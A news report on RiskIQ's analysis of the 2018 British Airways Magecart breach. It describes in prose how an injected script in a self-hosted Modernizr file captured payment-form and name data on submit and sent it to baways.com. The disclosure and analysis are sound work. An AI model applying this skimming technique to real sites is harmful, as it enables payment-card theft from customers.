RiskIQ's Yonathan Klijnsma said in a blog post on Tuesday that the BA report on the breach had mentioned the theft of customer data directly from payment forms and this was why his company had suspected Magecart.
He said BA had mentioned that payments to its main website and mobile app were both affected and the period when they were affected was from 22:58 BST 21 August (7.58am AEST 22 August) until 21:45 BST 5 September (6.45am AEST on 6 September).
To clear something up for those reporting on my latest story:— Yonathan Klijnsma (@ydklijnsma) September 11, 2018
Yes Modernizr is a 3rd party library but it was self hosted on the BA servers. This means the actors modified a script on the server which makes this a direct compromise of BA infrastructure, not a 3rd party.
Klijnsma said since 2016, RiskIQ had publicised the spread of devices known as card skimmers — hidden within credit card readers on ATMs, petrol pumps and other machines where people paid with credit cards — to steal credit card data. "Magecart uses a digital variety of these devices," he added.
The script was loaded from the baggage claim information page on the BA website; it had been changed right at the bottom in order not to break functionality. This made RiskIQ suspect that it could be the means of theft.
The modification dates of the two scripts — the original safe one and the newer malicious one — showed when people had started getting their payments stolen.
A ton of people have been asking us about confidence on Magecart for British Airways as it 'doesnt look like the older stuff'.— Yonathan Klijnsma (@ydklijnsma) September 12, 2018
Magecart is not 1 group, Magecart is the umbrella name for multiple groups in fact. We'll have a large report in a month or so explaining the timeline.
Outlining what the malicious script did, Klijnsma said:
- "Once every element on the page finishes loading it will:
- "Bind the mouseup and touchend events on a button known as submitButton with the following callback-code;
- "Serialise the data in a form with id paymentForm into a dictionary;
- "Serialise an item on the page with id personPaying into the same dictionary as the paymentForm information;
- "Make a text-string out of this serialised data; and
- "Send the data in the form of JSON to a server hosted on baways.com."
He pointed out that on websites, mouseup and touchend were events for when someone let go of the mouse after clicking on a button or when someone on a touchscreen (mobile) device let go of the screen after pushing a button.
"This means that once a user hits the button to submit their payment on the compromised British Airways site, the information from the payment form is extracted along with their name and sent to the attacker’s server. This attack is a simple, but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer which grabbed forms indiscriminately.
"This particular skimmer is very much attuned to how British Airway’s payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer."
Klijnsma suggested that those who suspected they were part of the 380,000 affected customers should obtain new credit cards right away.